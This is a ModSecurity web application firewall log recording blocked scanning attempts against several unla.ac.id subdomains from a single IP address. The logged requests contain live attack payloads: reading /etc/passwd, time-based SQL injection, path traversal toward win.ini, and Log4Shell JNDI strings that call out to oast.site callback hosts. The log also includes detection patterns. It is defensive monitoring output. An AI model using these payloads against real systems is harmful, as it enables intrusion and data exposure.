[Tue Aug 29 11:32:37.517716 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAPDoHwAAAAP"]
[Tue Aug 29 11:32:38.348338 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARMMcwAAAAR"]
[Tue Aug 29 11:32:38.349403 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARA7aUAAAAA"]
[Tue Aug 29 11:32:38.357261 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAAQOv@wAAAAw"]
[Tue Aug 29 11:32:38.363064 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARIwJkAAAAO"]
[Tue Aug 29 11:32:38.387408 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAAQOv@0AAAAw"]
[Tue Aug 29 11:32:38.407758 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQOv@4AAAAw"]
[Tue Aug 29 11:32:38.408556 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQ9H5UAAAAK"]
[Tue Aug 29 11:32:38.426878 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQOv@8AAAAw"]
[Tue Aug 29 11:32:38.445729 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARH7I4AAAAM"]
[Tue Aug 29 11:32:38.447948 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARA7akAAAAA"]
[Tue Aug 29 11:32:39.307689 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1058Co-f0AAARQ31wAAAAB"]
[Tue Aug 29 11:32:39.362939 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO1058Co-f0AAAQ9H58AAAAK"]
[Tue Aug 29 11:32:40.405340 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlge1p1p1c1zjkk1.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAPDoIQAAAAP"]
[Tue Aug 29 11:32:40.406646 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgscxwoecf63k59.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARMMdoAAAAR"]
[Tue Aug 29 11:32:40.415649 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlggbcph18qz5sur.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAQ9H6AAAAAK"]
[Tue Aug 29 11:32:40.419386 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg4pq9kwk1dm9fn.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAQOv-QAAAAw"]
[Tue Aug 29 11:32:40.427315 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgyapjyx7dzgmb1.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARMMdsAAAAR"]
[Tue Aug 29 11:32:40.495997 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgabwfadtqr8gxh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAN9sX8AAAAJ"]
[Tue Aug 29 11:32:42.479723 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARA7bQAAAAA"]
[Tue Aug 29 11:32:42.483123 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARD1PsAAAAH"]
[Tue Aug 29 11:32:42.490483 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARH7JYAAAAM"]
[Tue Aug 29 11:32:42.493118 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARIwKMAAAAO"]
[Tue Aug 29 11:32:42.516069 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARNk58AAAAS"]
[Tue Aug 29 11:32:42.531359 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARMMd0AAAAR"]
[Tue Aug 29 11:32:46.406593 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAAN9sYYAAAAJ"]
[Tue Aug 29 11:32:46.407608 2023] [:error] [pid 1108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARUroUAAAAI"]
[Tue Aug 29 11:32:46.408044 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARNk6MAAAAS"]
[Tue Aug 29 11:32:46.424001 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARR22wAAAAF"]
[Tue Aug 29 11:32:46.426824 2023] [:error] [pid 1108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARUroYAAAAI"]
[Tue Aug 29 11:32:46.447494 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAAN9sYgAAAAJ"]
[Tue Aug 29 11:32:47.535410 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARTEJcAAAAG"]
[Tue Aug 29 11:32:47.536344 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARQ32QAAAAB"]
[Tue Aug 29 11:32:47.536679 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARNk6YAAAAS"]
[Tue Aug 29 11:32:47.537789 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAAN9sYoAAAAJ"]
[Tue Aug 29 11:32:47.543900 2023] [:error] [pid 1108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARUrogAAAAI"]
